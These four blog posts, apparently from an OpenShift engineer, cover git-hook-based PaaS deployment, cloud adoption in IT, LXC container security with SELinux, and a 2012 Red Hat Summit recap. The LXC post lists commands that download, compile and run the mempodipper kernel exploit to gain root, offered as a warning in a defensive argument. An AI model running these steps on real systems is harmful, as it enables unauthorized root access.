Building an Open Source PaaS Deployment Model

To some, cloud is an excuse to introduce “black box” processes that lock users into their services.  But they can’t really come right out and say that.  Instead they distract from their approach with fanciful names and tell us that the cloud is full of magic and wonder that we don’t need to understand.  This type of innovation is exciting to some, but to me, combining innovation with a lock-in approach is depressing.  In the past, we’ve seen it at the operating system level and the hypervisor level.  We’ve also seen open source disrupt lock-in at both levels and we are going to see the same thing happen in the cloud.

When we started designing and building OpenShift, we wanted to provide more than just a good experience to end users that, in turn, locked them into our service.  One of the early design decisions we made on OpenShift was to utilize standards as much as we could and to make interactions transparent at all levels.  We did want the user experience to be magical but also completely accessible to those who wanted to dig in.  To demonstrate this, let’s walk through the deployment process in OpenShift – arguably the most magical part of the entire offering…

As we were designing a PaaS service focused on developers, our first goal was to make the deployment process as natural as possible for developers.  For most developers, their day to day process goes something like code, code, code, commit.  For those already questioning this process, let me speak on behalf of the developer in question by saying:

Tests?! Of course I’ve already written the tests!  They were in the third ‘code’!

Anyway, we wanted to plug into that process, and to do that we chose git.  The reason for selecting git over more centralized source code management tools like Subversion was that the distributed nature of git allowed the user to have full control over their data.  The user always had access to their entire historical repository, and as developers, we thought that was a critical requirement.  Given that, we standardized on git as the main link between our users’ code and OpenShift.

Now let’s look at what that development process might look like in practice.  First, you start off with the code, code, commit part:

vi <file of your choice>
# make earth shattering changes
git commit -a -m "My earth shattering comment"

The next part of the process for those familiar with git is the publish process.  You run a ‘push’ command to move your code from your local repository to your distributed clones.  So when you run:

git push

Your code is transferred to OpenShift and automatically deployed to your environment.  Regardless of whether code needs to be compiled, tests need to be run, dependencies need to be downloaded, or a specific packaging spec needs to be built – it all happens on the server side with this one command.  To do this we utilize a git hook to kick off the deployment process.  Wait – I know what you are thinking…

What?!  Just a git hook?!  This is the cloud baby!  Shouldn’t this be custom compiling my code into a Zeus Hammer to perform a magical Cloud Nuclear transfer?!!

If you ask us, a git hook works just fine because it’s what you would probably do yourself.  We simply use a standard git hook that kicks off a deployment script on the server.  That script invokes a series of scripts (called hooks) representing various steps in the deployment process.  Some of the hooks are provided by the cartridge that your application is using and some are provided by the application itself.  This approach lets the cartridge provide base functionality that can be further customized by the application.
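
To make the shape of that concrete, here is a rough sketch of what such a server-side hook could look like.  The directory layout and script paths below are illustrative assumptions, not the actual OpenShift code:

#!/bin/bash
# Hypothetical post-receive hook (illustrative only): runs on the server after
# 'git push', checks out the new code, and walks through the deployment steps.

# check the pushed code out into the application's working directory
GIT_WORK_TREE="$HOME/app" git checkout -f master

# run each deployment step; cartridge hooks first, then application hooks
for step in pre_build build deploy post_deploy; do
  if [ -x "$HOME/cartridge/hooks/$step" ]; then
    "$HOME/cartridge/hooks/$step"                     # cartridge-provided behavior
  fi
  if [ -x "$HOME/app/.openshift/action_hooks/$step" ]; then
    "$HOME/app/.openshift/action_hooks/$step"         # application-provided behavior
  fi
done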

First let’s talk about the cartridge hooks.  Having cartridge-specific hooks is important because each cartridge needs to do different things in its deployment process.  For example, when a Java cartridge detects a deployment, we want to do a Maven build, but when a Ruby cartridge detects a deployment, it should execute Bundler.  The cool part is that each individual cartridge can override anything it needs to in the default process.

Let’s look at how the Ruby cartridge implements this.  We can look at the ruby-1.9 cartridge’s overridden build hook, which runs Bundler against the application’s Gemfile.  When you use the Java cartridge, it leverages Maven in the build process in the same way.  You can implement the pieces that are right for your cartridge where it makes sense and still utilize the generic process everywhere else.  In isolation, each individual script is really quite simple.  In aggregate though, all those extensions can become extremely powerful and do much of the heavy lifting on behalf of the users.
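
As a rough illustration of what a cartridge build hook boils down to (the path here is an assumption and this is not the actual cartridge source), a Ruby cartridge’s build step could be as simple as:

#!/bin/bash
# Illustrative Ruby cartridge 'build' hook: install the application's gem
# dependencies with Bundler whenever the app ships a Gemfile.
cd "$HOME/app"
if [ -f Gemfile ]; then
  bundle install --deployment   # resolve and install the declared gems
fi

A Java cartridge’s equivalent hook would call Maven (for example, mvn package) at the same point in the process.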

But, what if you want to change the default behavior for a specific application?  No problem!  You have a collection of application-level action hooks at your disposal.  You could put your own code in pre_build, build, deploy, post_deploy or wherever else it makes sense.  These are found in your application in ~/.openshift/action_hooks.  They are invoked just like the cartridge hooks as part of the deployment process.  What you choose to do with these hooks is your decision.  Put some code in them and they will get called at each step in the deployment process.  This lets you not only leverage the power of a customized cartridge, but also lets you tweak and tune so things are just right for your application.
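
For instance, a hypothetical ~/.openshift/action_hooks/post_deploy script might run database migrations after every deployment finishes.  The rake task below is just an example of the kind of thing you could put there:

#!/bin/bash
# Example application-level post_deploy action hook: invoked after each
# deployment completes.  What goes here is entirely up to the application.
cd "$HOME/app"
bundle exec rake db:migrate   # e.g. apply any pending database migrations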

At the end of the day, harnessing the power of the cloud doesn’t need to lock you into a vendor.  At OpenShift, we believe that transparency, standards and extensibility will produce a process that stands the test of time.  I hope this has provided some visibility into how the OpenShift deployment model works and also has given you some insight into navigating the codebase.  And if this has piqued your interest and you find yourself digging through more and more code, please reach out and get involved.

IT Cloud Myths around Dynamic Demand (or the lack thereof….)

Today I read a great article that compared the adoption of cloud in IT to the adoption of open source.  In a nutshell, cloud is being resisted by IT groups much like open source used to be resisted.  Given my role on OpenShift and having been at Red Hat for several years, I’ve seen both forms of this resistance in the field.  In this post, I’ll try and debunk one of the most common IT dismissals of utilizing cloud:

I don’t have dynamic demand – cloud won’t help me

That is a tricky defense tactic because many people in IT believe it to be true.  To dispel this myth, I find it best to break demand into external and internal demand.

It is fairly easy to tell whether your company has dynamic external demand.  That usually boils down to whether or not you have seasonal demand (e.g. retail sites and Black Friday) or event-driven demand (e.g. a Super Bowl ad).  Companies with seasonal or spiky production demand have an obvious use case for the elasticity of cloud, but that is only half the story.

However, while relatively few companies have dynamic external demand, the vast majority of IT shops have an unknown dynamic demand internally: their own consumers and development teams.  But when first asked, they often believe this not to be the case.  The conversation usually goes this way:

Question: Are you giving your users all the resources they think they need?

Answer: No.  They always ask for more than they need and we don’t have the capacity.  The initial requests just aren’t reasonable.

Question: Is the process for getting resources easy or self-service or does it require a ton of justification and cost?

Answer: We have to make the process tough.  If we gave users what they asked for, we’d go broke!

Question: Do your users ever give back unused resources or do they try and hold on to them forever?

Answer: That’s just it – they never give anything back!  They would keep it forever if we didn’t watch them like hawks and claw it all back…

At that point, this is the question that often makes them re-think their initial assumption about not having dynamic demand internally:

Question: If you gave users everything they wanted and were able to recoup those resources when they weren’t used, would you have dynamic demand?

Answer: (long pause) Yeah…. I guess we would.  (long pause) Haven’t thought about it that way before…

I’ve had this same conversation play out time and time again.  Most of the guys on the IT side aren’t knowingly being malicious, but they have built a protective system over the course of years and have lost sight of what their users actually need.  They think that they are protecting users from themselves whereas in reality, they are eliminating themselves as a credible service provider.  Under-served users will just go directly to the public cloud providers and work around IT entirely.  This has been happening with SaaS offerings such as Salesforce.com for years and the behavior will be no different with public cloud providers.

IT organizations that embrace these changes are more likely to end up being a strategic partner with their users.  By leveraging cloud technologies instead of rejecting them, they can revolutionize the way they provide compute resources to their users and combine that with the valuable corporate data they already have.  Having worked in IT, I think this is the underlying desire of many IT shops.  Unfortunately, the processes they have built for themselves are often working against that desire without them even knowing it.  Those that survive will need to change, and change fast, to maintain relevance.

Are LXC containers enough?

First off, let me state that I think the LXC project is great.  In previous blog posts, I’ve talked about segmenting existing virtual machines to securely run multiple workloads and achieve better flexibility, cost, etc.  This concept is often referred to as ‘Linux Containers’ and creating these containers with the LXC project is a very popular approach.  LXC aggregates a collection of other technologies such as Linux Control Groups, Kernel Namespaces, Bind Mounts and others to accomplish this in an easy way.  Good stuff.  The question however, is whether LXC alone is enough to give you confidence in your approach to utilizing Linux containers.
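
For anyone who hasn’t played with it, the LXC userspace tools make standing up a container a handful of commands.  Template names and options vary by distribution and LXC version, so treat this as a sketch rather than a recipe:

# create a container from a distribution template (template availability varies)
sudo lxc-create -n web01 -t fedora

# start it in the background and confirm it is running
sudo lxc-start -n web01 -d
sudo lxc-info -n web01

# stop and remove it when you are done
sudo lxc-stop -n web01
sudo lxc-destroy -n web01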

In the words of Dan Berrange:

Repeat after me “LXC is not yet secure. [. . .]”

In other words, no, it’s not enough.  The main problem right now is that LXC doesn’t have any inherent protection against exploits that allow a user to become root.  In the world of Linux, traditionally if you have root you can do anything.  When using containers, that means that if one container can find a way to become root on the machine, it can do whatever it wants with all the other containers on the box.  I think the official term for that situation in IT is a ‘cluster’.  While the concept of capabilities is being introduced into the kernel to help segment the abilities that root actually has, that is a long way out from being a realistic defense, especially on the production systems in deployment today.

How realistic are these exploits, though?  To many, the concept of a kernel or security exploit is something they would rather believe just doesn’t actually happen.  Maybe they prefer to think that it’s limited to the realm of academic discussions.  Or maybe they just believe it’s not going to happen to them.

Unfortunately, the reality is quite different.  While I agree that finding an exploit requires an amazing amount of knowledge and creativity, using an exploit for malicious purposes isn’t that challenging.  For example, let’s look at the excellent article written by Jason A. Donenfeld about a kernel exploit that is able to achieve root access.  Jason explains how this exploit works in amazing detail here – http://blog.zx2c4.com/749.  Believe me, discovering that and writing that article was a LOT of work.  But now, let’s look at how easy it is to use that exploit on unpatched kernels:

  • Download the provided C program (e.g. wget http://bit.ly/wELTpn)
  • Compile it (gcc mempodipper.c -o mempodipper)
  • Run it and get root access (./mempodipper)

Pretty scary huh?  Three steps and I could get root on your machine.  I can hear the sighs of relief already though, as people start thinking:

I don’t have to worry about this since I don’t let people run arbitrary code on my machines…

Let’s discuss that train of thought for a minute.  First, let’s approach this from the perspective of a Platform as a Service (PaaS).  A PaaS essentially allows users to run their own code on machines shared by many.  That means experimenting with an exploit like this in a PaaS environment isn’t very difficult at all.  And remember, if any user can get root on that system, they own all the applications on it.

Not consuming or hosting a PaaS?  Well, I’ve spent many years in IT shops and the traditional IT deployments for large companies don’t look all that different.  Granted, the code is usually coming from employees and contractors, but you still probably don’t want to risk root exposures by anyone who is able to deploy a change into your environment.

Well if LXC doesn’t protect against this and my traditional environments are susceptible as well, is there any hope at all?!?!  Thankfully, there is.

The solution is using SELinux in combination with whatever container technologies you are using.  With an SELinux policy, you are essentially able to control the operations of any running process, regardless of which user it happens to be running as.  SELinux provides a layer of protection even against root, which is exactly where most other security mechanisms fail.  When a user is running in an SELinux context on a system and tries an exploit like the one above, you have an extra line of defense.  It’s easy for you to establish a confined environment that limits riskier operations like setuid syscalls and restricts memory access, which, in turn, would stop this exploit and others.  Most importantly, you get consistent protection across any process, no matter which user it is running as.
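
You can see that confinement on any Fedora or RHEL box.  The httpd example below is just an illustration of checking contexts and spotting denials, not a hardening guide:

getenforce                      # confirm SELinux is enforcing its policy
ps -eZ | grep httpd             # httpd runs confined in the httpd_t domain
ls -Z /var/www/html             # file contexts the policy lets httpd_t read

# when a confined process attempts something outside its policy, the kernel
# blocks the operation and logs an AVC denial you can inspect afterwards:
sudo ausearch -m avc -ts recent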

You can think of SELinux as a whitelisting approach instead of blacklisting.  The traditional model of security (often referred to as Discretionary Access Control or DAC) requires protecting against anything a user should not be able to do.  Given the complexity of systems today, that’s becoming unrealistic for mere mortals.  The SELinux model of security (often referred to as Mandatory Access Control or MAC) requires enabling everything a user should be able to do.

While it’s not a silver bullet, it’s an elegant mitigation in many areas.  Many types of IT hosting are becoming increasingly standardized, and you can put in place fairly simple policies that specify what users should be able to do.  For web applications, you are going to allow binding to HTTP / HTTPS ports.  You are probably going to allow JDBC connections.  You can describe the allowed behaviors of many of your applications in a fairly concise way.  Thinking of security this way mitigates many of the exploits that take a creative path like the one above (setuid access, /proc file descriptor access, and memory manipulation).  Unless you have a pretty special web application, it’s safe to say it shouldn’t be doing that stuff :)
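
On Fedora or RHEL, much of that “describe what the application is allowed to do” step is just flipping booleans and labeling ports in the policy that already ships with the distribution.  The specific boolean and port below are examples, not a complete recipe:

# see which switches the shipped web server policy already exposes
getsebool -a | grep httpd

# allow the web application to make outbound database connections
sudo setsebool -P httpd_can_network_connect_db on

# let httpd bind to a non-standard port by labeling it as an HTTP port
sudo semanage port -a -t http_port_t -p tcp 8081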

Interested in learning more?  The place I recommend starting is the Fedora documentation.  Fedora and RHEL have some of the best SELinux policies and support in the industry.  The documentation covers everything from learning SELinux to debugging it.  Most importantly though, don’t get fooled into thinking all Linux distributions are the same.  While SELinux support is in the kernel, what really matters is the ecosystem of policies that exist.  In Fedora or RHEL, you get whitelists ready-made for a slew of well known systems like Apache.  In many other distros, you’d spend your time having to recreate that work for the standard systems and never have any time to focus on your application policies.  That’s probably not the best use of your time, and it would be a daunting first experience with SELinux to say the least.
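
As a small taste of the debugging side, the usual Fedora/RHEL workflow when your application legitimately needs something the policy denies is to generate a local policy module from the audit log.  Always review what audit2allow proposes before loading it; ‘myapp_local’ is just a placeholder name:

# turn recent AVC denials into a candidate local policy module
sudo ausearch -m avc -ts recent | audit2allow -M myapp_local

# inspect the generated myapp_local.te, then load the compiled module
sudo semodule -i myapp_local.pp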

My last disclaimer is that even as powerful as SELinux is, I wouldn’t recommend putting all your eggs in one basket when it comes to security.  Combine SELinux with other security measures and maintain traditional operational best practices to minimize your exposure (e.g. apply security updates, audit, etc).  In other words, use it as an enhancement to what you do today, not a replacement.

Well, if you’ve made it this far, I’ll assume you are a convert: Welcome to the world of SELinux and sleeping a little better at night!

Red Hat Summit Recap – 2012

Last month we had our annual Red Hat Summit.  I always look forward to Summit because it gives me a chance to connect with users and customers in a way I don’t get on a day to day basis.  I try and spend as much time as I can with users and customers, both understanding their current needs and deducing some trends for the upcoming year.  Here are my conclusions for the 2012 Summit:

1. IT shops are moving beyond basic virtualization (finally!)

Now, this is probably a bit skewed since I’m an OpenShift guy and tend to be asked a lot of PaaS / IaaS / Cloud questions, but there was something different this year.  The questions I was being asked had enough depth that it wasn’t just casual prodding about what to expect from ‘cloud’, but questions from customers that had been through designs and experimentation themselves.  This was an exciting change for me because it means that IT shops are becoming comfortable enough with the core capabilities like virtualization and provisioning to pursue more.  Private cloud and IaaS capabilities are maturing quite a bit and there were a lot of questions on usage and expectations on all fronts.  The big issue everyone was bumping up against with the public cloud was data locality and regulations.  I think that is going to be a challenge for years to come, but luckily private cloud solutions are getting more robust, which will let IT shops in that predicament still compete.  In fact, Red Hat announced our Enterprise PaaS offering, which includes offerings installable in customer data centers.  I think being able to bridge the private and public cloud is going to be a key requirement for any vendor looking to compete in this space.

2. SELinux is getting more popular with cloud deployments

I’m not used to being asked SELinux questions at all really.  Heck, I’m usually the guy promoting it at conferences and educating people on it.  So by the 3rd or 4th time SELinux conversations were coming up, I had to wonder what was changing.  My conclusion is that with most things cloud, achieving maximum density and cost effectiveness is usually a primary goal.  However, in many cases, extreme density comes at the cost of security.  Given the number of security exposures that made big headlines recently, it appears that a refocusing on the security side of solutions is occurring.  It also appears that people are starting to realize that SELinux provides a very elegant way to avoid having to make this compromise.  SELinux provides a layer of security at the kernel that allows you to securely segment filesystem and process interactions (among other things).  This allows you to run a variety of workloads on the same machines, using and overcommitting the underlying resources as necessary without giving up the ability to segment those applications.  Segmentation used to be something only attempted at a virtual machine or physical machine level.  That is no longer the case.  On OpenShift we’ve been fans of this approach for a long time and it has worked extremely well.  Glad that others are looking at the same model.

3. Developer efficiency is becoming a focus of IT shops

Okay, this one is definitely biased since I’m a PaaS guy.  That said, before I was a PaaS guy, I was an IT guy.  I worked on both the development and the operational side of the house for several years.  One of the things I learned about operations is that they traditionally care more about the running system than the development process.  The opposite was true for development – they often ignore the complexities of keeping their code running and focus on cutting new code.  However, as operations generally controls much of the IT budget, it was always a struggle to actually get the development side of the house productive.  In 2009, the idea of a DevOps model was introduced which would bring both sides of IT closer together and harmony would ensue… Why then has it taken until 2012 for this to start to take hold?  I think a very strong catalyst was needed to force a change in the existing behavior.  And these days, there are quite a few catalysts that are forcing change in many companies: the public cloud, the economy and startup competition.  For the first time in a while, I was talking with customers that were legitimately trying to bring their development and operational processes together.  In some cases, it was an operational change driven by the transparency of public cloud pricing and the realization that if they couldn’t compete, developers could get services elsewhere.  In some cases it was the economic pressure pushing companies to do more with less.  And in other cases, it was the realization of what some very small companies have been able to achieve just using cloud-based services.  Whatever the motivation, companies are re-invigorated to compete and ready to change to make that happen.  I love seeing that and I think these companies will be the ones that push the boundaries of PaaS offerings and help that space continue to evolve.